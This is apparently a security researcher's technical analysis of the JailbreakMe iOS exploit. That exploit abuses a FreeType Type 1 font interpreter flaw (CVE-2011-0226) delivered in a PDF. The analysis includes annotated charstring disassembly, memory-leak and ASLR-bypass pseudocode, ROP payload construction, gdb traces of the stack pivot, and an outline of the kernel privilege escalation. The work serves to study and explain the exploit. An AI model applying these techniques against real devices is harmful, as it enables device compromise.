The vulnerability (CVE-2011-0226) is located in the interpreter for Type 1 font programs. Vector font formats like Adobe Type 1 use small interpreted programs to render characters outlines at different sizes. In Freetype the t1_decoder_parse_charstrings function is responsible for executing such programs (called charstrings).

To start our analysis we need to extract the font from the jailbreakme PDF file, we can do this using Origami :

require "origami"
include Origami

pdf = PDF.read("iPhone_4.3.3_8J2.pdf")
data = pdf.get_object(12).data
File.open("jbmev3_t1font.bin", "wb") {|f| f.write(data) }

In order to disassemble the charstrings contained in the font, I could not get t1disas to work so I wrote a minimal Python script to disassemble Type 1 opcodes. The Type 1 specification is available on Adobe's website. It is not necessary to understand everything about fonts and font programs, we just need to figure out the primitives used in the exploit and their effects on the interpreter state. The main structure used by the interpreter is T1_DecoderRec, defined in include/freetype/internal/psaux.h :

//sizeof T1_DecoderRec = 0x5dc
typedef struct  T1_DecoderRec_
{
        T1_BuilderRec        builder;

        //offsetof stack = 0x70
        //T1_MAX_CHARSTRINGS_OPERANDS = 256
        FT_Long              stack[T1_MAX_CHARSTRINGS_OPERANDS];

        //offsetof top = 0x470
        FT_Long*             top;//stack pointer

        //offsetof zones = 0x474
        T1_Decoder_ZoneRec   zones[T1_MAX_SUBRS_CALLS + 1];
        {
                FT_Byte*  cursor;
                FT_Byte*  base;
                FT_Byte*  limit;
        }

        T1_Decoder_Zone      zone;//current zone

        FT_Service_PsCMaps   psnames;
        FT_UInt              num_glyphs;
        FT_Byte**            glyph_names;

        FT_Int               lenIV;
        FT_UInt              num_subrs;
        //offsetof subrs = 0x558
        FT_Byte**            subrs;
        FT_PtrDist*          subrs_len;

        FT_Matrix            font_matrix;
        FT_Vector            font_offset;

        FT_Int               flex_state;
        FT_Int               num_flex_vectors;
        FT_Vector            flex_vectors[7];

        PS_Blend             blend;
        //offsetof hint_mode = 0x5BC
        FT_Render_Mode       hint_mode;

        //offsetof parse_callback = 0x5c0
        T1_Decoder_Callback  parse_callback;
        //offsetof funcs = 0x5c4
        T1_Decoder_FuncsRec  funcs;
        {
                FT_Error (*init)( T1_Decoder           decoder,
                                 FT_Face              face,
                                 FT_Size              size,
                                 FT_GlyphSlot         slot,
                                 FT_Byte**            glyph_names,
                                 PS_Blend             blend,
                                 FT_Bool              hinting,
                                 FT_Render_Mode       hint_mode,
                                 T1_Decoder_Callback  callback );

                void (*done)( T1_Decoder  decoder );

                FT_Error (*parse_charstrings)( T1_Decoder  decoder,
                                                          FT_Byte*    base,
                                                          FT_UInt     len );
        }

        //offsetof buildchar = 0x5d0
        FT_Long*             buildchar;
        //offsetof len_buildchar = 0x5d4
        FT_UInt              len_buildchar;
        //offsetof seac = 0x5d8
        FT_Bool              seac;

} T1_DecoderRec;

The main memory locations available to a legitimate font program and used by the exploit are :

  • the operand/result stack (decoder->stack). This stack grows "up".
  • two variables : x and y (local variables in t1_decoder_parse_charstrings)
  • the decoder->buildchar array

The buildchar array is actually defined and initialized (all zeroes) by the /BuildCharArray command in the font. Its size is set to 0x30000.

The vulnerable code and the main idea behind comex's exploit were mentioned by windknown on twitter : a missing check on the arg_cnt parameter for the callothersubr operation allows a malicious font program to move the interpreter stack pointer outside of its bounds, providing read and write access to various fields of the T1_DecoderRec structure (and the "real" stack since this structure is a local variable of the T1_Load_Glyph function).

The jailbreakme font program uses this vulnerability to read the decoder->parse_callback field (and a few others), construct a ROP payload in the decoder->buildchar array, and execute this payload by overwriting decoder->parse_callback and triggering a call to this function pointer. The following primitives are used to program the interpreter (the "weird machine") :

  • push instructions : write constant value on the interpreter stack. The stack pointer is checked before use.
  • op_setcurrentpoint : read 2 dwords from the stack into variables x and y. This operation does not check the stack pointer.
  • callothersubr #00 : write the x and y variables on the stack. This operation does not check the stack pointer but has preconditions : decoder->flex_state != 0 && decoder->num_flex_vectors == 7. The argument count for this routine is 3 but only the first 2 parameters are used (overwritten with x and y).
  • callothersubr #42 : calls an invalid subroutine with a negative argument count to bring the stack pointer beyond the stack area. This is the vulnerability that makes the exploit work.
  • op_hstem3, op_hmoveto, op_unknown15 instructions to "bring down" the stack pointer back into its bounds
  • callothersubr #12 : reset the stack pointer (top = decoder->stack)
  • callothersubr #20 and #21 : add/subtract values on the stack
  • callothersubr #23 and #24 : read/write dwords in the buildchar array.

The PDF document contains a single page with the @ (at) character, using the malicious font. The /at font program will be run to render this character, this is the entry point of the exploit. 10 subroutines are also defined in the font and used by the /at font program :

  • subroutine 0 : "fake" subroutine, contains a zlib compressed mach-o binary that is dropped in /tmp/locutus and run by the ROP payload once the kernel exploit is done
  • subroutine 1 : empty (op_return)
  • subroutine 2 : exit interpreter (op_endchar)
  • subroutine 3 : calls callothersubr #01 to set decoder->flex_state=1 and executes callothersubr #02 seven times to set decoder->num_flex_vectors=7 : this routine sets the preconditions for the "write variables to stack unchecked" primitive (callothersubr #00)

Subroutines 4 to 7 are the primitives for the ROP payload construction :

  • subroutine 4 : write dword, increments index
    • subr4(param) => buildchar[buildchar[3]++] = param
  • subroutine 5 : write gadget/function address with ASLR offset (shared cache slide)
    • subr5(param) => subr4(param + buildchar[1]) = subr4(param + shared_cache_slide)
  • subroutine 6 : write dword + stack offset (used to get subroutine 0 address and restore the stack pointer once the ROP payload is done)
    • subr6(param) => subr4(param + buildchar[0]) = subr4(param + &decoder->zones[0])
  • subroutine 7 : write dword + buildchar array base (for "local" variables used by the ROP payload)
    • subr7(param) => subr4(param + buildchar[2]) = subr4(param + &buildchar[0])

Subroutines 8 & 9 are responsible for writing a ROP payload to the buildchar array : they contain some initialization code (described shortly hereafter), followed by a sequence of calls to subroutines 4,5,6 and 7.

Here is the annotated disassembly of the /at font program start :

--------------------------------------------------------------------------------
File: at.bin			SHA1: 49b6ea93254f9767ad8d314dd77ecb6850f18412
--------------------------------------------------------------------------------
0x00000000  8e      push 0x3                 	
0x00000001  8b      push 0x0                 	
0x00000002  0c 21   op_setcurrentpoint       	; x=0x3; y=0x0
0x00000004  8e      push 0x3                 	
0x00000005  0a      callsubr #03             	; subr_enable_endflex
0x00000006  fb ef   push 0xfea50000          	
0x00000008  b5      push 0x2a                	
0x00000009  0c 10   callothersubr #42 nargs=-347;top=&decoder->seac + 4
0x0000000b  0c 10   callothersubr           	; #00 (decoder->seac) nargs=3 (decoder->len_buildchar >> 16)
                                                ; endflex : top[0]=x; top[1]=y; top += 2
                                                ; decoder->funcs.done = x  = 0x30000 (0x3 << 16)
                                                ; decoder->funcs.parse_charstrings = y = 0x0
0x0000000d  16      op_hmoveto               	; top -= 1; x += top[0]
0x0000000e  16      op_hmoveto               	; top -= 1; x += top[0]
0x0000000f  16      op_hmoveto               	; top -= 1; x += top[0]
0x00000010  0c 21   op_setcurrentpoint       	; top -= 2; x=decoder->hint_mode=0; y=decoder->parse_callback
0x00000012  0c 02   op_hstem3                	; top -= 6
0x00000014  0c 02   op_hstem3                	; top -= 6
0x00000016  0c 02   op_hstem3                	; top -= 6
0x00000018  0c 02   op_hstem3                	; top -= 6
0x0000001a  0c 02   op_hstem3                	; top -= 6
0x0000001c  0c 02   op_hstem3                	; top -= 6
0x0000001e  0c 02   op_hstem3                	; top -= 6
0x00000020  0c 02   op_hstem3                	; top -= 6
0x00000022  0c 02   op_hstem3                	; top -= 6
0x00000024  0c 02   op_hstem3                	; top -= 6
0x00000026  0c 02   op_hstem3                	; top -= 6
0x00000028  0c 02   op_hstem3                	; top -= 6
0x0000002a  0c 02   op_hstem3                	; top -= 6
0x0000002c  0f      op_unknown15             	; top -= 2 (/* nothing to do except to pop the two arguments */)
0x0000002d  0f      op_unknown15             	; top -= 2 (/* nothing to do except to pop the two arguments */)
0x0000002e  16      op_hmoveto               	; top -= 1; x += decoder->zone => x = &decoder->zones[0]
0x0000002f  0c 02   op_hstem3                	; top -= 6
0x00000031  0c 02   op_hstem3                	; top -= 6
0x00000033  8e      push 0x3                 	
0x00000034  0a      callsubr #03             	; subr_enable_endflex
0x00000035  8b      push 0x0                 	
0x00000036  8b      push 0x0                 	
0x00000037  8b      push 0x0                 	
0x00000038  8e      push 0x3                 	
0x00000039  8b      push 0x0                 	
0x0000003a  0c 10   callothersubr #00 nargs=3	; endflex : top[0]=x; top[1]=y; top += 2
0x0000003c  8c      push 0x1                 	
0x0000003d  8d      push 0x2                 	
0x0000003e  a3      push 0x18                	
0x0000003f  0c 10   callothersubr #24 nargs=2	; decoder->buildchar[1] = y = decoder->parse_callback = T1_Parse_Glyph
0x00000041  8b      push 0x0                 	
0x00000042  8d      push 0x2                 	
0x00000043  a3      push 0x18                	
0x00000044  0c 10   callothersubr #24 nargs=2	; decoder->buildchar[0] = x = &decoder->zones[0]

The program starts by initializing the variables x and y to the values 0x3 and 0x0. The instruction callothersubr #42 nargs=-347 exploits the bug to move the stack pointer at the end of the T1DecoderRec structure, right after the seac field, which is set to 0 when the structure is initialized. The length of the buildchar array was set to 0x30000, which is chosen specifically to make the len_buildchar and seac fields look like the "stack frame" for the callothersubr #00 primitive (0x30000 is 0x3 encoded in the 16.16 fixed point format used by the interpreter). Hence, the following callothersubr instruction (at offset 0xb) will write the x and y values over the funcs.done and funcs.parse_charstrings fields. This overwrite is a preparatory step for the end of the font program, where the parse_callback field is overwritten using the same primitive.

The stack pointer is then decremented by 3 op_hmoveto instructions to point to the funcs field (right after the parse_callback field). The following op_setcurrentpoint operation will read the hint_mode and parse_callback fields into the x and y variables. The stack pointer is then decremented back in the stack area to allow the next instructions to run without errors. In the process, the value of the zone field (which points to zones[0]) is also read into the x variable by the op_hmoveto instruction at offset 0x2e (it is added to the hint_mode value which is 0). The x and y variables are then pushed onto the stack (using the subroutine #03 to enable callothersubr #00), and stored in buildchar[0] and buildchar[1]. The next sequence, starting at offset 0x46 with callothersubr #42 nargs=-151 follows the same pattern : it reads the decoder->buildchar pointer and stores it in buildchar[2].

Next, the value 0x7918 is written to buildchar[3] : this will be used as the index for the ROP payload building routine. This leaves 0x7918 * 4 bytes for the stack frames of functions called by the ROP payload.

Another value is also leaked using callothersubr #42 nargs=-152 and stored in buildchar[4], this is the value of the __gxx_personality_sj0 symbol stored on the stack frame of the calling function FT::font::load_glyph. Because the User-Agent field only identifies iPhone/iPad/iPod and firmware version, but not the specific model (i.e iPhone 3GS or iPhone 4), the font program contains multiple ROP building subroutines. The correct function is chosen by comparing the difference between __gxx_personality_sj0 and T1_Parse_Glyph. Since the two symbols are located in different shared libraries (libstdc++.6.dylib and libCGFreetype.A.dylib) and because the order of those libraries in the shared cache is different for the same firmware version on different devices (see Stefan Esser's talk at POC 2010), this delta identifies the device (thanks to comex for explaining this part).

The payload building subroutine number for the identified device is then pushed on the stack using conditional instructions (callothersubr #27). Depending on the device, subroutine 8 or 9 will be called.

The ROP building subroutine starts by subtracting the default T1_Parse_Glyph address from the one leaked in buildchar[1]. Now buildchar[1] contains the shared cache slide (see Stefan Esser's talk at HITB AMS 2011), which will be used by subroutine 5 to adjust the gadgets addresses written to the ROP stack and successfully bypass ASLR. Then, the address of a gadget (scale_QT+254) is computed and placed in the y variable using op_setcurrentpoint. After that, the ROP payload is constructed dword by dword, using subroutines 4,5,6 and 7. Some values that cannot be encoded directly in push operations are computed using the subtract operation.

Once the ROP payload building is done, the \at routine recopies the first 7 dword values from the constructed ROP stack onto the decoder stack. These 7 values will be used to perform the stack pivot to the "main" ROP stack stored in the buildchar array. The last step is to overwrite decoder->parse_callback with the y variable contents. It is now that the funcs.done and funcs.parse_charstrings values make sense : the callothersubr #42 nargs=-337 (at offset 0x167) brings the stack pointer at the end of the decoder->funcs structure, whose fields were modified to be 0x30000 and 0x0, so the next callothersubr instruction calls the write primitive (callothersubr #00), that will overwrite the parse_callback field with the gadget address stored in the y variable.

Finally, the font program ends with the op_seac instruction, that triggers the following calls:

  • t1operator_seac (this function is actually inlined in t1_decoder_parse_charstrings)
  • t1_decoder_parse_glyph
  • decoder->parse_callback() that will initiate the stack pivot

The overall operation of the font exploit can be summarized by the following pseudocode :

at_pseudocode
{
    //required for decoder->parse_callback = y at the end
    decoder->funcs.done = 0x30000 // (0x3 << 16)
    decoder->funcs.parse_charstrings = 0x0

    //leak members of the decoder structure and store them at the start of decoder->buildchar
    y = decoder->parse_callback = T1_Parse_Glyph
    x = &decoder->zones[0]

    decoder->buildchar[1] = y = T1_Parse_Glyph
    decoder->buildchar[0] = x = &decoder->zones[0]

    y = decoder->buildchar
    decoder->buildchar[2] = y = decoder->buildchar

    y = __gxx_personality_sj0
    decoder->buildchar[3] = 0x7918

    //exit (subr 2) on ARMv6 devices, where T1_Parse_Glyph is not compiled in thumb
    //otherwise call subr3
    //callsubr 2 + T1_Parse_Glyph % 2
    callsubr (2 + ((decoder->buildchar[1] / 2) * 2))

    //detect exact device
    decoder->buildchar[4] = y - decoder->buildchar[1]  = __gxx_personality_sj0 - T1_Parse_Glyph

    //this does not match the disassembly, but this is the idea
    if( decoder->buildchar[4] == 0xff2ab38b)
        rop_build_subr = 8 //iphone 3gs
    else //if( decoder->buildchar[4] == 0xfff5a38b)
        rop_build_subr = 9 //iphone 4
        
    callsubr rop_build_subr
    {
        //compute ASLR slide
        decoder->buildchar[1] -= T1_Parse_Glyph_default_addr
        y = gadget1 - decoder->buildchar[1]

        //... build rop payload with subroutines 4,5,6,7
    }

    //recopy stack pivot ROP chain
    decoder->stack[0] = buildchar[0x7918]
    decoder->stack[1] = buildchar[0x7919]
    decoder->stack[2] = buildchar[0x791a]
    decoder->stack[3] = buildchar[0x791b]
    decoder->stack[4] = buildchar[0x791c]
    decoder->stack[5] = buildchar[0x791d]
    decoder->stack[6] = buildchar[0x791e]

    decoder->parse_callback = y

    //op_seac => initiate stack pivot
    decoder->parse_callback()
}

At this point, we can attach gdb to MobileSafari and set a breakpoint in t1_decoder_parse_glyph to see the transfer to the ROP payload :

Breakpoint 1, 0x33ce83b0 in t1_decoder_parse_glyph ()
(gdb) bt
#0  0x33ce83b0 in t1_decoder_parse_glyph ()
#1  0x33ce99b0 in t1_decoder_parse_charstrings ()
#2  0x33cda63c in T1_Parse_Glyph_And_Get_Char_String ()
#3  0x33cda966 in T1_Load_Glyph ()
#4  0x33cd1b2c in FT_Load_Glyph ()
#5  0x33cc7332 in FT::font::load_glyph ()
#6  0x33cc9fce in FT::path_builder::build_path_for_glyph ()
#7  0x33cca41a in FT::path_builder::create_path_for_glyph ()
#8  0x33ccd4de in (anonymous namespace)::create_glyph_path ()
#9  0x31e9dfac in CGFontCreateGlyphPath ()
...
#58 0x329b0806 in UIApplicationMain ()
#59 0x000d01dc in ?? ()
(gdb) x/3i $pc
0x33ce83b0 <t1_decoder_parse_glyph+4>:  ldr.w   r3, [r0, #1472]
0x33ce83b4 <t1_decoder_parse_glyph+8>:  blx     r3	;return decoder->parse_callback()
0x33ce83b6 <t1_decoder_parse_glyph+10>: pop     {r7, pc}
(gdb) si 2
0x32e14f4a in scale_QT ()
(gdb) x/2i $pc
0x32e14f4a <scale_QT+254>:      add     sp, #320
0x32e14f4c <scale_QT+256>:      pop     {r4, r5, pc}
(gdb) si
0x32e14f4c in scale_QT ()
(gdb) x/8x $sp			; sp = &decoder->stack[0]
0x2fec9760:     0x00000000      0x00000000      0x305a0cbd      0x03a36478
0x2fec9770:     0x305a38fd      0x00000000      0x00000000      0xfeaf0000
(gdb) si
0x305a0cbc in TICandQualityFilter_fr::TICandQualityFilter_fr ()
(gdb) x/i $pc
0x305a0cbc <_ZN22TICandQualityFilter_frC1ERKN2KB6VectorINS0_4WordEEEPK10__CFLocale+8>:
      pop     {r7, pc}
(gdb) si
0x305a38fc in -[NoteContext copyNotesForSearch:complete:] ()
(gdb) x/2i $pc
0x305a38fc <-[NoteContext copyNotesForSearch:complete:]+20>:    sub.w   sp, r7, #0      ; 0x0
0x305a3900 <-[NoteContext copyNotesForSearch:complete:]+24>:    pop     {r7, pc}
(gdb) si
0x305a3900 in -[NoteContext copyNotesForSearch:complete:] ()
(gdb) x/32x $sp			;sp = &buildchar[0x791e]
0x3a36478:      0x00000000      0x305a0dbd      0x2fec9c48      0x00000000
0x3a36488:      0x00000000      0x00000000      0x305e343f      0x03a3679c
0x3a36498:      0x00000000      0x305c6379      0x00000000      0x32e1d613
0x3a364a8:      0x03a364c4      0x32e1d613      0x3322d8fd      0x31552538
0x3a364b8:      0x3edab084      0x03a36ec8      0x03a36ee0      0x00000000
0x3a364c8:      0x305c6379      0x03a364d8      0x305b5889      0x33841129
0x3a364d8:      0x03a364e4      0x305b5889      0x03a365e8      0x00000000
0x3a364e8:      0x32e1d613      0x03a36920      0x305a0e97      0x03a36514

We can then use the following gdb script to dump the main ROP payload and the gadgets used.

set $i=$sp
while $i < $sp+0xE00
        if *$i > 0x30000000
                x/3i *$i
        end
        if *$i < 0x30000000
                x/x $i
        end
        set $i=$i+4
end

This ROP payload exploits a kernel vulnerability in the IOMobileFramebuffer IOKit interface (CVE-2011-0227), using a kernel ROP payload that recopies a shellcode at address 0x80000400 (executable slack space at the beginning of the kernelcache mapping). The kernel shellcode patches various kernel functions to allow unsigned applications to run. It also installs a handler for syscall 0 whose sole purpose is to give root privileges to the calling process. This is used at the start of the main funtion in the locutus binary. The syscall handler is one-shot, it removes itself from the sysent array as soon as it is called (and it is not present in the untether binary since this is only required for the jailbreak installation process).

Once the kernel exploit is done, the mach-o binary contained in subroutine 0 is decompressed into /tmp/locutus and run using the posix_spawn function. Finally, the stack pointer is restored and execution resumes at the t1_decoder_parse_charstrings epilog. The R0 register is also set to 0x00000539 so that the font parser exits with a 1337 error code :) The locutus binary then installs Cydia and the untethered jailbreak package. A shared library is injected into the SpringBoard process (using mach calls and the thread_create_running function) to display the Cydia icon with a progress bar, just like a regular application installation.

This new version of jailbreakme is really impressive, and features the first public exploit that actively bypasses the ASLR mechanism introduced with iOS 4.3. A homebrew patch is even provided (PDF Patcher2) to avoid any controversy about "irresponsible disclosure". Hats off to comex !